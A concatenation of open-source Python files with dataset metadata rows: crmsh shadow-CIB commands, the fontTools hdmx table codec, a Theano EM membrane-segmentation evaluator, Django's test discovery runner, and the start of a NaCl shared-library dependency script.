name = os.path.basename(fname).replace("shadow.", "")
constants.tmp_cib = True
if "empty" in opt_l:
new_cmd = "%s -e '%s'" % (self.extcmd, name)
else:
new_cmd = "%s -c '%s'" % (self.extcmd, name)
if constants.tmp_cib or config.core.force or "force" in opt_l or "--force" in opt_l:
new_cmd = "%s --force" % new_cmd
if utils.ext_cmd(new_cmd) == 0:
context.info("%s shadow CIB created" % name)
self.do_use(context, name)
if "withstatus" in opt_l:
cib_status.load("shadow:%s" % name)
def _find_pe(self, context, infile):
'Find a pe input'
for p in ("%s/%s", "%s/%s.bz2", "%s/pe-*-%s.bz2"):
fl = glob.glob(p % (config.path.pe_state_dir, infile))
if fl:
break
if not fl:
context.fatal_error("no %s pe input file" % infile)
if len(fl) > 1:
context.fatal_error("more than one %s pe input file: %s" %
(infile, ' '.join(fl)))
if not fl[0]:
context.fatal_error("bad %s pe input file" % infile)
return fl[0]
@command.skill_level('administrator')
@command.completers(compl.null, compl.shadows)
def do_import(self, context, infile, name=None):
"usage: import {<file>|<number>} [<shadow>]"
if name and not utils.is_filename_sane(name):
context.fatal_error("Bad filename: " + name)
# where's the input?
if not os.access(infile, os.F_OK):
if "/" in infile:
context.fatal_error(str(infile) + ": no such file")
infile = self._find_pe(context, infile)
if not name:
name = os.path.basename(infile).replace(".bz2", "")
if not xmlutil.pe2shadow(infile, name):
context.fatal_error("Error copying PE file to shadow: %s -> %s" % (infile, name))
# use the shadow and load the status from there
return self.do_use(context, name, "withstatus")
@command.skill_level('administrator')
@command.completers(compl.shadows)
def do_delete(self, context, name):
"usage: delete <shadow_cib>"
if not utils.is_filename_sane(name):
context.fatal_error("Bad filename: " + name)
if utils.get_cib_in_use() == name:
context.fatal_error("%s shadow CIB is in use" % name)
if utils.ext_cmd("%s -D '%s' --force" % (self.extcmd, name)) == 0:
context.info("%s shadow CIB deleted" % name)
else:
context.fatal_error("failed to delete %s shadow CIB" % name)
@command.skill_level('administrator')
@command.completers(compl.shadows)
def do_reset(self, context, name):
"usage: reset <shadow_cib>"
if not utils.is_filename_sane(name):
context.fatal_error("Bad filename: " + name)
if utils.ext_cmd("%s -r '%s'" % (self.extcmd, name)) == 0:
context.info("copied live CIB to %s" % name)
else:
context.fatal_error("failed to copy live CIB to %s" % name)
@command.skill_level('administrator')
@command.wait
@command.completers(compl.shadows)
def do_commit(self, context, name=None):
"usage: commit [<shadow_cib>]"
if name and not utils.is_filename_sane(name):
context.fatal_error("Bad filename: " + name)
if not name:
name = utils.get_cib_in_use()
if not name:
context.fatal_error("There is nothing to commit")
if utils.ext_cmd("%s -C '%s' --force" % (self.extcmd, name)) == 0:
context.info("committed '%s' shadow CIB to the cluster" % name)
else:
context.fatal_error("failed to commit the %s shadow CIB" % name)
if constants.tmp_cib:
self._use('', '')
@command.skill_level('administrator')
def do_diff(self, context):
"usage: diff"
rc, s = utils.get_stdout(utils.add_sudo("%s -d" % self.extcmd_stdout))
utils.page_string(s)
@command.skill_level('administrator')
def do_list(self, context):
"usage: list"
if options.regression_tests:
for t in xmlutil.listshadows():
print t
else:
utils.multicolumn(xmlutil.listshadows())
def _use(self, name, withstatus):
# Choose a shadow cib for further changes. If the name
# provided is empty, then choose the live (cluster) cib.
# Don't allow ' in shadow names
if not name or name == "live":
if withstatus:
cib_status.load("live")
if constants.tmp_cib:
utils.ext_cmd("%s -D '%s' --force" % (self.extcmd, utils.get_cib_in_use()))
constants.tmp_cib = False
utils.clear_cib_in_use()
else:
utils.set_cib_in_use(name)
if withstatus:
cib_status.load("shadow:%s" % name)
return True
@command.skill_level('administrator')
@command.completers(compl.join(compl.shadows, compl.choice(['live'])),
compl.choice(['withstatus']))
def do_use(self, context, name='', withstatus=''):
"usage: use [<shadow_cib>] [withstatus]"
# check the name argument
if name and not utils.is_filename_sane(name):
context.fatal_error("Bad filename: " + name)
if name and name != "live":
if not os.access(xmlutil.shadowfile(name), os.F_OK):
context.fatal_error("%s: no such shadow CIB" % name)
if withstatus and withstatus != "withstatus":
context.fatal_error("Expected 'withstatus', got '%s'" % (withstatus))
# If invoked from configure
# take special precautions
if not context.previous_level_is("cibconfig"):
return self._use(name, withstatus)
if not cib_factory.has_cib_changed():
ret = self._use(name, withstatus)
# new CIB: refresh the CIB factory
cib_factory.refresh()
return ret
saved_cib = utils.get_cib_in_use()
self._use(name, '') # don't load the status yet
if not cib_factory.is_current_cib_equal(silent=True):
# user made changes and now wants to switch to a
# different and unequal CIB; we refuse to cooperate
context.error_message("the requested CIB is different from the current one")
if config.core.force:
context.info("CIB overwrite forced")
elif not utils.ask("All changes will be dropped. Do you want to proceed?"):
self._use(saved_cib, '') # revert to the previous CIB
return False
return self._use(name, withstatus) # now load the status too
# vim:ts=4:sw=4:et:
| gpl-2.0 | 1,797,367,856,346,419,000 | 38.940909 | 93 | 0.57255 | false |
googlei18n/TachyFont | run_time/src/gae_server/third_party/old-fonttools-master/Lib/fontTools/ttLib/tables/_h_d_m_x.py | 11 | 3008 | from __future__ import print_function, division, absolute_import
from fontTools.misc.py23 import *
from fontTools.misc import sstruct
from . import DefaultTable
hdmxHeaderFormat = """
> # big endian!
version: H
numRecords: H
recordSize: l
"""
class table__h_d_m_x(DefaultTable.DefaultTable):
def decompile(self, data, ttFont):
numGlyphs = ttFont['maxp'].numGlyphs
glyphOrder = ttFont.getGlyphOrder()
dummy, data = sstruct.unpack2(hdmxHeaderFormat, data, self)
self.hdmx = {}
for i in range(self.numRecords):
ppem = byteord(data[0])
maxSize = byteord(data[1])
widths = {}
for glyphID in range(numGlyphs):
widths[glyphOrder[glyphID]] = byteord(data[glyphID+2])
self.hdmx[ppem] = widths
data = data[self.recordSize:]
assert len(data) == 0, "too much hdmx data"
def compile(self, ttFont):
self.version = 0
numGlyphs = ttFont['maxp'].numGlyphs
glyphOrder = ttFont.getGlyphOrder()
self.recordSize = 4 * ((2 + numGlyphs + 3) // 4)
pad = (self.recordSize - 2 - numGlyphs) * b"\0"
self.numRecords = len(self.hdmx)
data = sstruct.pack(hdmxHeaderFormat, self)
items = sorted(self.hdmx.items())
for ppem, widths in items:
data = data + bytechr(ppem) + bytechr(max(widths.values()))
for glyphID in range(len(glyphOrder)):
width = widths[glyphOrder[glyphID]]
data = data + bytechr(width)
data = data + pad
return data
def toXML(self, writer, ttFont):
writer.begintag("hdmxData")
writer.newline()
ppems = sorted(self.hdmx.keys())
records = []
format = ""
for ppem in ppems:
widths = self.hdmx[ppem]
records.append(widths)
format = format + "%4d"
glyphNames = ttFont.getGlyphOrder()[:]
glyphNames.sort()
maxNameLen = max(map(len, glyphNames))
format = "%" + repr(maxNameLen) + 's:' + format + ' ;'
writer.write(format % (("ppem",) + tuple(ppems)))
writer.newline()
writer.newline()
for glyphName in glyphNames:
row = []
for ppem in ppems:
widths = self.hdmx[ppem]
row.append(widths[glyphName])
if ";" in glyphName:
glyphName = "\\x3b".join(glyphName.split(";"))
writer.write(format % ((glyphName,) + tuple(row)))
writer.newline()
writer.endtag("hdmxData")
writer.newline()
def fromXML(self, name, attrs, content, ttFont):
if name != "hdmxData":
return
content = strjoin(content)
lines = content.split(";")
topRow = lines[0].split()
assert topRow[0] == "ppem:", "illegal hdmx format"
ppems = list(map(int, topRow[1:]))
self.hdmx = hdmx = {}
for ppem in ppems:
hdmx[ppem] = {}
lines = (line.split() for line in lines[1:])
for line in lines:
if not line:
continue
assert line[0][-1] == ":", "illegal hdmx format"
glyphName = line[0][:-1]
if "\\" in glyphName:
from fontTools.misc.textTools import safeEval
glyphName = safeEval('"""' + glyphName + '"""')
line = list(map(int, line[1:]))
assert len(line) == len(ppems), "illegal hdmx format"
for i in range(len(ppems)):
hdmx[ppems[i]][glyphName] = line[i]
| apache-2.0 | -7,661,074,452,810,834,000 | 29.08 | 64 | 0.651263 | false |
openconnectome/ndod | maca/packages/theano_membrane_segmentation/em_evaluate.py | 5 | 13425 | ################################################################################
# (c) [2013] The Johns Hopkins University / Applied Physics Laboratory All Rights Reserved.
# Contact the JHU/APL Office of Technology Transfer for any additional rights. www.jhuapl.edu/ott
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
################################################################################
""" Evaluates an previously trained CNN on a data set.
"""
import os, os.path
import sys, time
import argparse
import numpy
from scipy import ndimage
import h5py
import em_networks as EMN
from em_utils import *
from tiles import *
def evaluate_network(nn, X, pp_func, selectedPixels, lowerPixels, upperPixels, outDir="."):
"""
now uses evaluate_network(nn, X, pp_func_curried, outDir=args.outDir, selectedPixels, lowerPixels, upperPixels)
before was: evaluate_network(nn, X, pp_func, lbX=float('-Inf'), ubX=float('Inf'), outDir=".")
Runs a (previously trained) neural network against the test data set X.
"""
tileSize = nn.p
border = numpy.floor(tileSize/2.)
X = mirror_edges_tensor(X, border)
Y = numpy.zeros(X.shape) # we do not have labels for test data
# create a tile manager
testMgr = TileManager(X, Y, tileSize=tileSize)
nTestBatches = int(numpy.ceil(testMgr.batchSize / nn.miniBatchSize))
# set up Theano
print '[em_evaluate]: initializing Theano (using device %s)...' % theano.config.device
index = T.lscalar()
# note: I threw away the nn.y parameter - I think it is unnecessary and actually
# causes problems in newer versions of Theano.
predict_test_data = theano.function([index], nn.layers[-1].p_y_given_x,
givens={
nn.x: testMgr.X_batch_GPU[index*nn.miniBatchSize:(index+1)*nn.miniBatchSize]})
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# evaluation phase
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
print '[em_evaluate]: beginning evaluation (using device %s)...' % theano.config.device
Y_hat = numpy.zeros(X.shape)
cnt = 0
startTime = time.clock()
#for slices,rows,cols in testMgr.make_all_pixel_generator():
#for slices,rows,cols in testMgr.make_bandpass_pixel_generator(lbX, ubX):
for slices,rows,cols in testMgr.make_selected_pixel_generator(selectedPixels):
# update tiles on the GPU
testMgr.update_gpu(slices,rows,cols,flipDim=0,rotDir=0)
for ii in range(nTestBatches):
# predictions is a (nTiles x 2) matrix
# grab the second output (y=1)
# (i.e. we store probability of membrane)
pMembrane = predict_test_data(ii)[:,1]
# Be careful - on the last iteration, there may be
# less than batchSize tiles remaining.
a = ii*nn.miniBatchSize
b = min((ii+1)*nn.miniBatchSize, len(slices))
if a > len(slices): break
Y_hat[slices[a:b], rows[a:b], cols[a:b]] = pMembrane[0:b-a]
# report status every so often
cnt += 1
if numpy.mod(cnt,10)==1:
print '[em_evaluate]: last processed (%d, %d, %d). Net time: %0.2f m' % (slices[-1], rows[-1], cols[-1], (time.clock()-startTime)/60.)
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# postprocessing
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# discard the border (optional)
if True:
p2 = int(numpy.floor(tileSize/2.0))
X = X[:, p2:-p2, p2:-p2]
Y_hat = Y_hat[:, p2:-p2, p2:-p2]
print '[em_evaluate]: postprocessing...'
Y_hat = pp_func(X, Y_hat)
# apply "bandpass" classification values
#Y_hat[X < lbX] = 0
#Y_hat[X > ubX] = 0
Y_hat[lowerPixels] = 1 # we actually made the classifier classify nonmembrane, so these pixels have probability 1 of being nonmembrane. (A temporary fix for now)
Y_hat[upperPixels] = 1
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# save results
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
print '[em_evaluate]: done processing. saving results...'
# numpy output
numpy.savez(os.path.join(outDir, 'test-results'), X=X, Y_hat=Y_hat, P=selectedPixels)
# hdf5 output
f5 = h5py.File(os.path.join(outDir, 'test-results.hdf5'), 'w')
f5.create_dataset('Y_hat', data=Y_hat)
# also save as a .tif Unfortunately, it doesn't appear that
# PIL has a good way of *creating* a multi-page tif. So we'll
# save each slice independently and rely on some outside tool
# to merge them together (or leave them as separate files).
for sliceId in range(X.shape[0]):
X_i = X[sliceId,:,:]
Y_hat_i = Y_hat[sliceId,:,:]
# The ISBI conference wants the cube to represent probability
# of non-membrane, so invert the probabilities before saving.
fn = os.path.join(outDir, 'test_slice%02d_Yhat.tif' % sliceId)
save_tiff_data(1.0 - Y_hat_i, fn)
# Save a copy of the input data as well.
fn = os.path.join(outDir, 'test_slice%02d_X.tif' % sliceId)
save_tiff_data(X_i, fn, rescale=True)
return Y_hat
def postprocess(X, Y_hat, cubicCoeffs=[]):
Y_hatC = numpy.zeros(Y_hat.shape)
# TODO: a better estimate for these coefficients
#
# NOTE: these were derived for ISBI 2012. You'll need to
# re-derive these for other data sets.
#coeffs = [1.133, -0.843, 0.707]
for ii in range(Y_hat.shape[0]):
Yi = Y_hat[ii,:,:]
# calibrate
if len(cubicCoeffs) == 3:
print '[em_evaluate]: performing cubic calibration'
#Y_hatC[ii,:,:] = (Yi**3)*cubicCoeffs[0] + (Yi**2)*cubicCoeffs[1] + Yi*cubicCoeffs[2]
Y_hatC[ii,:,:] = numpy.minimum(1,(Yi**3)*cubicCoeffs[0] + (Yi**2)*cubicCoeffs[1] + Yi*cubicCoeffs[2])
Y_hatC[ii,:,:] = numpy.maximum(0,Y_hatC[ii,:,:])
else:
print '[em_evaluate]: omitting cubic calibration'
Y_hatC[ii,:,:] = Yi
# median filter
# Y_hatC[ii,:,:] = median_filter(Y_hatC[ii,:,:],r=4)
# Aurora took out median filtering, dean and will requested that they will do it themselves, we just do the coefficient calibration
return Y_hatC
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
if __name__ == '__main__':
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
parser = argparse.ArgumentParser('Evaluate a neural network on an EM data set')
parser.add_argument('-n', dest='network', type=str, default='LeNetMembraneN3',
help='neural network architecture')
parser.add_argument('-X', dest='volumeFileName', type=str,
default=os.path.join('..', '..', 'Data', 'EM_2012', 'test-volume.tif'),
help='the data to evaluate')
parser.add_argument('-Y', dest='labelsFileName', type=str, default=None,
help='ground truth labels (optional)')
parser.add_argument('--eval-slices', dest='evalSliceExpr', type=str, default='',
help='A python-evaluatable string indicating which slices should be used for validation (or empty string to evaluate the whole stack)')
parser.add_argument('-p', dest='paramFileName', type=str, default='params_epoch001.npz',
help='the neural network parameters to load')
parser.add_argument('-o', dest='outDir', type=str, default='.',
help='output directory')
# preprocessing arguments
parser.add_argument('--normalizeinputs', dest='normalizeinputs', type=bool, default=True,
help='this boolean input, if True, says that Input X should be renormalized before evaluation (default is true)')
parser.add_argument('--intensity-lower-bound', dest='xLowerBound', type=float, default=float('-Inf'),
help='membrane pixel intensities less than this bound have membrane probability 0')
parser.add_argument('--intensity-upper-bound', dest='xUpperBound', type=float, default=float('Inf'),
help='membrane pixel intensities greater than this bound have membrane probability 0')
parser.add_argument('--thresh-dilation-kernel', dest='threshDilationKernel', type=int, default=0,
help='size of selected pixel dilation kernel (or 0 for no dilation)')
parser.add_argument('--thresh-erosion-kernel', dest='threshErosionKernel', type=int, default=0,
help='size of selected pixel erosion kernel (or 0 for no erosion)')
# postprocessing arguments
parser.add_argument('--cubic-coeffs', dest='cubicCoeffs', type=str, default="[]",
help='coefficients to use with cubic postprocessing (or [] for none)')
args = parser.parse_args()
args.cubicCoeffs = eval(args.cubicCoeffs)
# create a neural network instance
clazz = getattr(EMN, args.network)
nn = clazz()
print '[em_evaluate]: Using the following parameters:'
print ' network: %s' % nn.__class__.__name__
for key, value in vars(args).iteritems():
print ' %s: %s' % (key, value)
print '\n'
# load the volume
if args.volumeFileName.endswith('.tif'):
X = load_tiff_data(args.volumeFileName)
elif args.volumeFileName.endswith('.npz'):
# assumes volume data is stored as the tensor X
X = numpy.load(args.volumeFileName)['X']
else:
raise RuntimeError('unexpected data file extension')
# pare down to set of slices that are of interest (optional)
if len(args.evalSliceExpr):
evalSlices = eval(args.evalSliceExpr)
X = X[evalSlices]
# preprocessing. This includes volume normalization (optional) and thresholding (optional)
selectedPixels = numpy.logical_and(args.xLowerBound <= X, X <= args.xUpperBound)
# Note: I observed strange behavior when running the erosion
# operator on the entire tensor in a single call. So for now,
# I'll do this a slice at a time until I can figure out what the
# situation is with the tensor.
if args.threshDilationKernel > 0:
kernel = ndimage.generate_binary_structure(2,1)
kernel = ndimage.iterate_structure(kernel, args.threshDilationKernel).astype(int)
for ii in range(selectedPixels.shape[0]):
selectedPixels[ii,:,:] = ndimage.binary_dilation(selectedPixels[ii,:,:], structure=kernel, iterations=1)
else:
print '[em_evaluate]: no threshold dilation will be applied'
if args.threshErosionKernel > 0:
kernel = ndimage.generate_binary_structure(2,1)
kernel = ndimage.iterate_structure(kernel, args.threshErosionKernel).astype(int)
for ii in range(selectedPixels.shape[0]):
selectedPixels[ii,:,:] = ndimage.binary_erosion(selectedPixels[ii,:,:], structure=kernel, iterations=1)
else:
print '[em_evaluate]: no threshold erosion will be applied'
lowerPixels = numpy.logical_and(numpy.logical_not(selectedPixels), X < args.xLowerBound)
upperPixels = numpy.logical_and(numpy.logical_not(selectedPixels), X > args.xUpperBound)
if args.normalizeinputs :
for ii in range(X.shape[0]):
X[ii,:,:] = X[ii,:,:] - numpy.mean(X[ii,:,:])
X = X / numpy.max(numpy.abs(X))
print ' volume dim: %d x %d x %d' % (X.shape[0], X.shape[1], X.shape[2])
print ' volume min/max: %0.2f %0.2f' % (numpy.min(X), numpy.max(X))
print ' # pixels to eval: %d' % numpy.sum(selectedPixels)
print ''
if not os.path.exists(args.outDir): os.makedirs(args.outDir)
# load the parameters and run it
EMN.load_network_parameters(nn, args.paramFileName)
pp_func_curried = lambda X, Yhat: postprocess(X, Yhat, args.cubicCoeffs)
#Y_hat = evaluate_network(nn, X, pp_func_curried, outDir=args.outDir, lbX=args.xLowerBound, ubX=args.xUpperBound)
# changed to now use the already found selectedPixels, rather than applying upper and lower bounds
Y_hat = evaluate_network(nn, X, pp_func_curried, selectedPixels, lowerPixels, upperPixels, outDir=args.outDir)
# generate performance metrics, if applicable
if args.labelsFileName is not None:
Y = load_tiff_data(args.labelsFileName)
assert(numpy.all(numpy.logical_or(Y==0, Y==255)))
# remap values to 1=membrane, 0=non-membrane
Y[Y==0] = 1; Y[Y==255] = 0;
for ii in range(Y_hat.shape[0]):
print '[em_evaluate]: performance for slice %d:' % ii
eval_performance(Y[ii,:,:], Y_hat[ii,:,:], .5, verbose=True)
| apache-2.0 | -4,521,729,864,298,892,300 | 45.134021 | 165 | 0.597542 | false |
cafecivet/django_girls_tutorial | Lib/site-packages/django/test/runner.py | 6 | 11523 | from importlib import import_module
import os
from optparse import make_option
import unittest
from unittest import TestSuite, defaultTestLoader
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from django.test import SimpleTestCase, TestCase
from django.test.utils import setup_test_environment, teardown_test_environment
class DiscoverRunner(object):
"""
A Django test runner that uses unittest2 test discovery.
"""
test_suite = TestSuite
test_runner = unittest.TextTestRunner
test_loader = defaultTestLoader
reorder_by = (TestCase, SimpleTestCase)
option_list = (
make_option('-t', '--top-level-directory',
action='store', dest='top_level', default=None,
help='Top level of project for unittest discovery.'),
make_option('-p', '--pattern', action='store', dest='pattern',
default="test*.py",
help='The test matching pattern. Defaults to test*.py.'),
)
def __init__(self, pattern=None, top_level=None,
verbosity=1, interactive=True, failfast=False,
**kwargs):
self.pattern = pattern
self.top_level = top_level
self.verbosity = verbosity
self.interactive = interactive
self.failfast = failfast
def setup_test_environment(self, **kwargs):
setup_test_environment()
settings.DEBUG = False
unittest.installHandler()
def build_suite(self, test_labels=None, extra_tests=None, **kwargs):
suite = self.test_suite()
test_labels = test_labels or ['.']
extra_tests = extra_tests or []
discover_kwargs = {}
if self.pattern is not None:
discover_kwargs['pattern'] = self.pattern
if self.top_level is not None:
discover_kwargs['top_level_dir'] = self.top_level
for label in test_labels:
kwargs = discover_kwargs.copy()
tests = None
label_as_path = os.path.abspath(label)
# if a module, or "module.ClassName[.method_name]", just run those
if not os.path.exists(label_as_path):
tests = self.test_loader.loadTestsFromName(label)
elif os.path.isdir(label_as_path) and not self.top_level:
# Try to be a bit smarter than unittest about finding the
# default top-level for a given directory path, to avoid
# breaking relative imports. (Unittest's default is to set
# top-level equal to the path, which means relative imports
# will result in "Attempted relative import in non-package.").
# We'd be happy to skip this and require dotted module paths
# (which don't cause this problem) instead of file paths (which
# do), but in the case of a directory in the cwd, which would
# be equally valid if considered as a top-level module or as a
# directory path, unittest unfortunately prefers the latter.
top_level = label_as_path
while True:
init_py = os.path.join(top_level, '__init__.py')
if os.path.exists(init_py):
try_next = os.path.dirname(top_level)
if try_next == top_level:
# __init__.py all the way down? give up.
break
top_level = try_next
continue
break
kwargs['top_level_dir'] = top_level
if not (tests and tests.countTestCases()) and is_discoverable(label):
# Try discovery if path is a package or directory
tests = self.test_loader.discover(start_dir=label, **kwargs)
# Make unittest forget the top-level dir it calculated from this
# run, to support running tests from two different top-levels.
self.test_loader._top_level_dir = None
suite.addTests(tests)
for test in extra_tests:
suite.addTest(test)
return reorder_suite(suite, self.reorder_by)
def setup_databases(self, **kwargs):
return setup_databases(self.verbosity, self.interactive, **kwargs)
def run_suite(self, suite, **kwargs):
return self.test_runner(
verbosity=self.verbosity,
failfast=self.failfast,
).run(suite)
def teardown_databases(self, old_config, **kwargs):
"""
Destroys all the non-mirror databases.
"""
old_names, mirrors = old_config
for connection, old_name, destroy in old_names:
if destroy:
connection.creation.destroy_test_db(old_name, self.verbosity)
def teardown_test_environment(self, **kwargs):
unittest.removeHandler()
teardown_test_environment()
def suite_result(self, suite, result, **kwargs):
return len(result.failures) + len(result.errors)
def run_tests(self, test_labels, extra_tests=None, **kwargs):
"""
Run the unit tests for all the test labels in the provided list.
Test labels should be dotted Python paths to test modules, test
classes, or test methods.
A list of 'extra' tests may also be provided; these tests
will be added to the test suite.
Returns the number of tests that failed.
"""
self.setup_test_environment()
suite = self.build_suite(test_labels, extra_tests)
old_config = self.setup_databases()
result = self.run_suite(suite)
self.teardown_databases(old_config)
self.teardown_test_environment()
return self.suite_result(suite, result)
def is_discoverable(label):
"""
Check if a test label points to a python package or file directory.
Relative labels like "." and ".." are seen as directories.
"""
try:
mod = import_module(label)
except (ImportError, TypeError):
pass
else:
return hasattr(mod, '__path__')
return os.path.isdir(os.path.abspath(label))
def dependency_ordered(test_databases, dependencies):
"""
Reorder test_databases into an order that honors the dependencies
described in TEST[DEPENDENCIES].
"""
ordered_test_databases = []
resolved_databases = set()
# Maps db signature to dependencies of all it's aliases
dependencies_map = {}
# sanity check - no DB can depend on its own alias
for sig, (_, aliases) in test_databases:
all_deps = set()
for alias in aliases:
all_deps.update(dependencies.get(alias, []))
if not all_deps.isdisjoint(aliases):
raise ImproperlyConfigured(
"Circular dependency: databases %r depend on each other, "
"but are aliases." % aliases)
dependencies_map[sig] = all_deps
while test_databases:
changed = False
deferred = []
# Try to find a DB that has all it's dependencies met
for signature, (db_name, aliases) in test_databases:
if dependencies_map[signature].issubset(resolved_databases):
resolved_databases.update(aliases)
ordered_test_databases.append((signature, (db_name, aliases)))
changed = True
else:
deferred.append((signature, (db_name, aliases)))
if not changed:
raise ImproperlyConfigured(
"Circular dependency in TEST[DEPENDENCIES]")
test_databases = deferred
return ordered_test_databases
def reorder_suite(suite, classes):
"""
Reorders a test suite by test type.
`classes` is a sequence of types
All tests of type classes[0] are placed first, then tests of type
classes[1], etc. Tests with no match in classes are placed last.
"""
class_count = len(classes)
suite_class = type(suite)
bins = [suite_class() for i in range(class_count + 1)]
partition_suite(suite, classes, bins)
for i in range(class_count):
bins[0].addTests(bins[i + 1])
return bins[0]
def partition_suite(suite, classes, bins):
"""
Partitions a test suite by test type.
classes is a sequence of types
bins is a sequence of TestSuites, one more than classes
Tests of type classes[i] are added to bins[i],
tests with no match found in classes are place in bins[-1]
"""
suite_class = type(suite)
for test in suite:
if isinstance(test, suite_class):
partition_suite(test, classes, bins)
else:
for i in range(len(classes)):
if isinstance(test, classes[i]):
bins[i].addTest(test)
break
else:
bins[-1].addTest(test)
def setup_databases(verbosity, interactive, **kwargs):
from django.db import connections, DEFAULT_DB_ALIAS
# First pass -- work out which databases actually need to be created,
# and which ones are test mirrors or duplicate entries in DATABASES
mirrored_aliases = {}
test_databases = {}
dependencies = {}
default_sig = connections[DEFAULT_DB_ALIAS].creation.test_db_signature()
for alias in connections:
connection = connections[alias]
test_settings = connection.settings_dict['TEST']
if test_settings['MIRROR']:
# If the database is marked as a test mirror, save
# the alias.
mirrored_aliases[alias] = test_settings['MIRROR']
else:
# Store a tuple with DB parameters that uniquely identify it.
# If we have two aliases with the same values for that tuple,
# we only need to create the test database once.
item = test_databases.setdefault(
connection.creation.test_db_signature(),
(connection.settings_dict['NAME'], set())
)
item[1].add(alias)
if 'DEPENDENCIES' in test_settings:
dependencies[alias] = test_settings['DEPENDENCIES']
else:
if alias != DEFAULT_DB_ALIAS and connection.creation.test_db_signature() != default_sig:
dependencies[alias] = test_settings.get('DEPENDENCIES', [DEFAULT_DB_ALIAS])
# Second pass -- actually create the databases.
old_names = []
mirrors = []
for signature, (db_name, aliases) in dependency_ordered(
test_databases.items(), dependencies):
test_db_name = None
# Actually create the database for the first connection
for alias in aliases:
connection = connections[alias]
if test_db_name is None:
test_db_name = connection.creation.create_test_db(
verbosity,
autoclobber=not interactive,
serialize=connection.settings_dict.get("TEST_SERIALIZE", True),
)
destroy = True
else:
connection.settings_dict['NAME'] = test_db_name
destroy = False
old_names.append((connection, db_name, destroy))
for alias, mirror_alias in mirrored_aliases.items():
mirrors.append((alias, connections[alias].settings_dict['NAME']))
connections[alias].settings_dict['NAME'] = (
connections[mirror_alias].settings_dict['NAME'])
return old_names, mirrors
| gpl-2.0 | 1,334,041,034,199,654,000 | 35.932692 | 104 | 0.601059 | false |
chromium/chromium | native_client_sdk/src/tools/lib/get_shared_deps.py | 4 | 6932 | # Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Helper script to close over all transitive dependencies of a given .nexe
executable.
e.g. Given
A -> B
B -> C
B -> D
C -> E
where "A -> B" means A depends on B, then GetNeeded(A) will return A, B, C, D
and E.
"""
import os
import re
import subprocess
import elf
SCRIPT_DIR = os.path.dirname(os.path.abspath(__file__))
SDK_DIR = os.path.dirname(os.path.dirname(SCRIPT_DIR))
NeededMatcher = re.compile('^ *NEEDED *([^ ]+)\n$')
FormatMatcher = re.compile('^(.+):\\s*file format (.+)\n$')
LOADER_X86 = 'runnable-ld.so' # Name of the dynamic loader
LOADER_ARM = 'elf_loader_arm.nexe' # Name of the ARM dynamic loader
OBJDUMP_ARCH_MAP = {
# Names returned by Linux's objdump:
'elf64-x86-64': 'x86-64',
'elf32-i386': 'x86-32',
'elf32-little': 'arm',
'elf32-littlearm': 'arm',
# Names returned by old x86_64-nacl-objdump:
'elf64-nacl': 'x86-64',
'elf32-nacl': 'x86-32',
# Names returned by new x86_64-nacl-objdump:
'elf64-x86-64-nacl': 'x86-64',
'elf32-x86-64-nacl': 'x86-64',
'elf32-i386-nacl': 'x86-32',
'elf32-littlearm-nacl': 'arm',
}
# The proper name of the dynamic linker, as kept in the IRT. This is
# excluded from the nmf file by convention.
LD_NACL_MAP = {
'x86-32': 'ld-nacl-x86-32.so.1',
'x86-64': 'ld-nacl-x86-64.so.1',
'arm': None,
}
class Error(Exception):
'''Local Error class for this file.'''
pass
class NoObjdumpError(Error):
'''Error raised when objdump is needed but not found'''
pass
def GetNeeded(main_files, objdump, lib_path):
'''Collect the list of dependencies for the main_files
Args:
main_files: A list of files to find dependencies of.
objdump: Path to the objdump executable.
lib_path: A list of paths to search for shared libraries.
Returns:
A dict with key=filename and value=architecture. The architecture will be
one of ('x86_32', 'x86_64', 'arm').
'''
dynamic = any(elf.ParseElfHeader(f)[1] for f in main_files)
if dynamic:
return _GetNeededDynamic(main_files, objdump, lib_path)
else:
return _GetNeededStatic(main_files)
def _GetNeededDynamic(main_files, objdump, lib_path):
examined = set()
all_files, unexamined = GleanFromObjdump(main_files, None, objdump, lib_path)
for arch in all_files.values():
if unexamined:
if arch == 'arm':
unexamined.add((LOADER_ARM, arch))
else:
unexamined.add((LOADER_X86, arch))
while unexamined:
files_to_examine = {}
# Take all the currently unexamined files and group them
# by architecture.
for name, arch in unexamined:
files_to_examine.setdefault(arch, []).append(name)
# Call GleanFromObjdump() for each architecture.
needed = set()
for arch, files in files_to_examine.items():
new_files, new_needed = GleanFromObjdump(files, arch, objdump, lib_path)
all_files.update(new_files)
needed |= new_needed
examined |= unexamined
unexamined = needed - examined
# With the runnable-ld.so scheme we have today, the proper name of
# the dynamic linker should be excluded from the list of files.
ldso = [LD_NACL_MAP[arch] for arch in set(OBJDUMP_ARCH_MAP.values())]
for filename, arch in list(all_files.items()):
name = os.path.basename(filename)
if name in ldso:
del all_files[filename]
return all_files
def GleanFromObjdump(files, arch, objdump, lib_path):
'''Get architecture and dependency information for given files
Args:
files: A list of files to examine.
[ '/path/to/my.nexe',
'/path/to/lib64/libmy.so',
'/path/to/mydata.so',
